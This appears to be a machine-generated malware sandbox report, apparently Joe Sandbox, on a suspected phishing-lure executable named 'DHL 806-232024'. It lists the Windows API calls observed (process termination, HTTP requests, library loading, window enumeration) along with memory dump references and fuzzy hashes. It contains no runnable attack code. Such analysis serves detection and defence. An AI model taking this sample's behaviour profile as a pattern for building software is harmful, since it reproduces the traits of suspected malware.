                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009356CF
                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009356D9
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009356E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                  • String ID:
                                                                                  • API String ID: 839392675-0
                                                                                  • Opcode ID: 32248c7cd49c5bf2f4000e93223da8bd1519667c43035021643cef142b0e477e
                                                                                  • Instruction ID: b58564f9a424215c935efad7fc888ce60b8a33fc88400c18efa78dcf63374ff0
                                                                                  • Opcode Fuzzy Hash: 32248c7cd49c5bf2f4000e93223da8bd1519667c43035021643cef142b0e477e
                                                                                  • Instruction Fuzzy Hash: 76F0123115A658BBE7215B539C0DEAB7B7CEBC6B22F000169FA04D105096A11A0197B5
                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 009374E5
                                                                                  • EnterCriticalSection.KERNEL32(?,?,008E1044,?,?), ref: 009374F6
                                                                                  • TerminateThread.KERNEL32(00000000,000001F6,?,008E1044,?,?), ref: 00937503
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,008E1044,?,?), ref: 00937510
                                                                                    • Part of subcall function 00936ED7: CloseHandle.KERNEL32(00000000,?,0093751D,?,008E1044,?,?), ref: 00936EE1
                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00937523
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,008E1044,?,?), ref: 0093752A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 3495660284-0
                                                                                  • Opcode ID: f3089ed2b331c9b9c17bdd236ffecf57311e5db46ca7cf5ad1c7b58dc58a8c6d
                                                                                  • Instruction ID: bf67e45c651568dac1ff1318c59fd46dba8b8c9df6974a6eec94e4904e215e1f
                                                                                  • Opcode Fuzzy Hash: f3089ed2b331c9b9c17bdd236ffecf57311e5db46ca7cf5ad1c7b58dc58a8c6d
                                                                                  • Instruction Fuzzy Hash: 8BF05EBA159B12EBEB212B65FC9CAEB772AEF45323F000531F202914B0CB755811EF60
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00928E7F
                                                                                  • UnloadUserProfile.USERENV(?,?), ref: 00928E8B
                                                                                  • CloseHandle.KERNEL32(?), ref: 00928E94
                                                                                  • CloseHandle.KERNEL32(?), ref: 00928E9C
                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00928EA5
                                                                                  • HeapFree.KERNEL32(00000000), ref: 00928EAC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                  • String ID:
                                                                                  • API String ID: 146765662-0
                                                                                  • Opcode ID: 9befc3d3b3a3fb891010adcbb87557263ad97929d51555d26ea1b2bd9d8397eb
                                                                                  • Instruction ID: 6fa208dc5ab3ac009fb1253b928113c5a644ba4b0e00cf32fa6d8d5bf01144fa
                                                                                  • Opcode Fuzzy Hash: 9befc3d3b3a3fb891010adcbb87557263ad97929d51555d26ea1b2bd9d8397eb
                                                                                  • Instruction Fuzzy Hash: 7AE05276119A05FBDA012FE6EC1C95ABB69FB89773B508631F21981470CB32A461EB50
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(?), ref: 00948928
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00948A37
                                                                                  • VariantClear.OLEAUT32(?), ref: 00948BAF
                                                                                    • Part of subcall function 00937804: VariantInit.OLEAUT32(00000000), ref: 00937844
                                                                                    • Part of subcall function 00937804: VariantCopy.OLEAUT32(00000000,?), ref: 0093784D
                                                                                    • Part of subcall function 00937804: VariantClear.OLEAUT32(00000000), ref: 00937859
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                  • API String ID: 4237274167-1221869570
                                                                                  • Opcode ID: d5b467d2e6b6c495163015dcd2b2250fe177ef57e2942763fcab83f98471a622
                                                                                  • Instruction ID: 4e6d45d07431a9eda622af34a0d2c990c910bb08f5ffa885b96af37d857047fa
                                                                                  • Opcode Fuzzy Hash: d5b467d2e6b6c495163015dcd2b2250fe177ef57e2942763fcab83f98471a622
                                                                                  • Instruction Fuzzy Hash: 389137756087019FC714EF28C48496BBBE8EF89354F044A6EF89A8B361DB31E945CB52
                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0092DAC5
                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0092DAFB
                                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0092DB0C
                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0092DB8E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                  • String ID: DllGetClassObject
                                                                                  • API String ID: 753597075-1075368562
                                                                                  • Opcode ID: 2eb2ad613d2cbd24378248836d58902ffa45df9e547486387f108a9e6ce891f5
                                                                                  • Instruction ID: 9c4cfdb5bbd5a724a098ab9ca35f716d6f1a02acf90da82c7ccc7f5209bbe730
                                                                                  • Opcode Fuzzy Hash: 2eb2ad613d2cbd24378248836d58902ffa45df9e547486387f108a9e6ce891f5
                                                                                  • Instruction Fuzzy Hash: DC41C0B1601318EFDB14CF65D894BAA7BB9EF44310F1580A9AD05DF249D7B0DE40DBA0
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00932CAF
                                                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00932CCB
                                                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00932D11
                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00996890,00000000), ref: 00932D5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 1173514356-4108050209
                                                                                  • Opcode ID: 514e5cf8f45b99896bdd531ef308a1516c4164595779a368ded17479cc3b03c6
                                                                                  • Instruction ID: 1a690cb7f380787b703f269de2913779c6ad2699d21d83ef08b4d26b02e47715
                                                                                  • Opcode Fuzzy Hash: 514e5cf8f45b99896bdd531ef308a1516c4164595779a368ded17479cc3b03c6
                                                                                  • Instruction Fuzzy Hash: 28416D302043029FD720DF24C845B6ABBE8EF85720F14465EF965972D1DB70E905CF92
                                                                                  APIs
                                                                                  • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0094DAD9
                                                                                    • Part of subcall function 008D79AB: _memmove.LIBCMT ref: 008D79F9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharLower_memmove
                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                  • API String ID: 3425801089-567219261
                                                                                  • Opcode ID: ec389411829ef7fd71196598b126b51dff4848c99de693ff21ff31be2224b341
                                                                                  • Instruction ID: 17d8aca3329868fd2df9c865f7ab86e72bef78b7a7697c3fc2b87707d6aa74e9
                                                                                  • Opcode Fuzzy Hash: ec389411829ef7fd71196598b126b51dff4848c99de693ff21ff31be2224b341
                                                                                  • Instruction Fuzzy Hash: 1F31A17450061AAFCF10EF68C890DBEB3B4FF05310B108B2AE866E7795DB31A905CB90
                                                                                  APIs
                                                                                    • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                                                    • Part of subcall function 0092B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0092B0E7
                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009293F6
                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00929409
                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00929439
                                                                                    • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$_memmove$ClassName
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 365058703-1403004172
                                                                                  • Opcode ID: ad8e0c16998d83422603110da73da0ef751f799cc58b8b569c49ec1d4dee56db
                                                                                  • Instruction ID: 2140341865b5843939b0b745020db6974db68d6ffe404b5f4a04949edd7d7deb
                                                                                  • Opcode Fuzzy Hash: ad8e0c16998d83422603110da73da0ef751f799cc58b8b569c49ec1d4dee56db
                                                                                  • Instruction Fuzzy Hash: 37212671940118BFDB14AB74EC85DFFB7BCEF45324F14422AF921972E4DB38090A9610
                                                                                  APIs
                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00941B40
                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00941B66
                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00941B96
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00941BDD
                                                                                    • Part of subcall function 00942777: GetLastError.KERNEL32(?,?,00941B0B,00000000,00000000,00000001), ref: 0094278C
                                                                                    • Part of subcall function 00942777: SetEvent.KERNEL32(?,?,00941B0B,00000000,00000000,00000001), ref: 009427A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                  • String ID:
                                                                                  • API String ID: 3113390036-3916222277
                                                                                  • Opcode ID: f918870e64e84d672d8a4eb49c1ace523641ea1791b9f294d24ad3e7e4a18d17
                                                                                  • Instruction ID: ac0d7e7e0d1589450799e11f5238e95a6be509503740e0eb02d60521e94cd314
                                                                                  • Opcode Fuzzy Hash: f918870e64e84d672d8a4eb49c1ace523641ea1791b9f294d24ad3e7e4a18d17
                                                                                  • Instruction Fuzzy Hash: 0F21CAB1604308BFEB119F219CD5EBF76ECEB89B58F10012AF905A7240EB249D44A7A1
                                                                                  APIs
                                                                                    • Part of subcall function 008D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008D1D73
                                                                                    • Part of subcall function 008D1D35: GetStockObject.GDI32(00000011), ref: 008D1D87
                                                                                    • Part of subcall function 008D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 008D1D91
                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009566D0
                                                                                  • LoadLibraryW.KERNEL32(?), ref: 009566D7
                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009566EC
                                                                                  • DestroyWindow.USER32(?), ref: 009566F4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                  • String ID: SysAnimate32
                                                                                  • API String ID: 4146253029-1011021900
                                                                                  • Opcode ID: 4d2828c8f78219101159d3e4d1fe664f717d779989b73727d28e864163592699
                                                                                  • Instruction ID: 23902a479bde9961816dfcba1cafff86f2600363d7559d349c77aa7de9046b5d
                                                                                  • Opcode Fuzzy Hash: 4d2828c8f78219101159d3e4d1fe664f717d779989b73727d28e864163592699
                                                                                  • Instruction Fuzzy Hash: C721BE71100205ABEF108E6AEC90EAB77ADEB5937AF900629FD1093190C771CC45A760
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 0093705E
                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00937091
                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 009370A3
                                                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 009370DD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHandle$FilePipe
                                                                                  • String ID: nul
                                                                                  • API String ID: 4209266947-2873401336
                                                                                  • Opcode ID: 0ae7e64425638d4e18ef81c2de8ce43bdef47caaaf71836a713486cce1fadbd7
                                                                                  • Instruction ID: 1e0d55557bb864c7b9efcdb201e05d1daedda35dc56351a769eda7401a3c461a
                                                                                  • Opcode Fuzzy Hash: 0ae7e64425638d4e18ef81c2de8ce43bdef47caaaf71836a713486cce1fadbd7
                                                                                  • Instruction Fuzzy Hash: C4215EB4508309ABDB349FB9DC05A9AB7A8AF84720F208A19FCA1D72D0E77098509F50
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 0093712B
                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0093715D
                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 0093716E
                                                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009371A8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHandle$FilePipe
                                                                                  • String ID: nul
                                                                                  • API String ID: 4209266947-2873401336
                                                                                  • Opcode ID: 044ecd815acb7e44fd9c4d5e2d7606af79873452cd8305071f26068bbd363b1f
                                                                                  • Instruction ID: 3282a5c7224a14a5f94ef7759eb55df171a5bd57dbad5da89f4cab2e521edb05
                                                                                  • Opcode Fuzzy Hash: 044ecd815acb7e44fd9c4d5e2d7606af79873452cd8305071f26068bbd363b1f
                                                                                  • Instruction Fuzzy Hash: 7A215EB650C309ABDB309FE99C04AAAB7A8AF55730F204A19F9A1D72D0D77098418F61
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0093AEBF
                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0093AF13
                                                                                  • __swprintf.LIBCMT ref: 0093AF2C
                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,0095F910), ref: 0093AF6A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                                  • String ID: %lu
                                                                                  • API String ID: 3164766367-685833217
                                                                                  • Opcode ID: 6cce2733b04d874708e37687d6c7aa5d80e35dce664bd4585b3db028ab257f0b
                                                                                  • Instruction ID: e9b2810ccc84b56ed67b4fb9200802c2409aeb3e357056054bb2dcad93176af3
                                                                                  • Opcode Fuzzy Hash: 6cce2733b04d874708e37687d6c7aa5d80e35dce664bd4585b3db028ab257f0b
                                                                                  • Instruction Fuzzy Hash: F7216230600209AFCB10EF65C885EAE7BB8FF89714F004069F945DB351DB31EA41DB61
                                                                                  APIs
                                                                                    • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                                                                    • Part of subcall function 0092A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0092A399
                                                                                    • Part of subcall function 0092A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0092A3AC
                                                                                    • Part of subcall function 0092A37C: GetCurrentThreadId.KERNEL32 ref: 0092A3B3
                                                                                    • Part of subcall function 0092A37C: AttachThreadInput.USER32(00000000), ref: 0092A3BA
                                                                                  • GetFocus.USER32 ref: 0092A554
                                                                                    • Part of subcall function 0092A3C5: GetParent.USER32(?), ref: 0092A3D3
                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0092A59D
                                                                                  • EnumChildWindows.USER32(?,0092A615), ref: 0092A5C5
                                                                                  • __swprintf.LIBCMT ref: 0092A5DF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                  • String ID: %s%d
                                                                                  • API String ID: 1941087503-1110647743
                                                                                  • Opcode ID: 4d14e3163f31924aa4492541247c5ff27206ca42999ae1002ce1e99c8265801a
                                                                                  • Instruction ID: c647ea0dad858d9fb9d8bac10321d9953a060e68d5d290c85e4c2bf158f3586a
                                                                                  • Opcode Fuzzy Hash: 4d14e3163f31924aa4492541247c5ff27206ca42999ae1002ce1e99c8265801a
                                                                                  • Instruction Fuzzy Hash: BA11DF72204218ABDF10BF64EC85FEA377DEF88310F0440B6B908AA19ADB7459458B36
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00932048
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpper
                                                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                  • API String ID: 3964851224-769500911
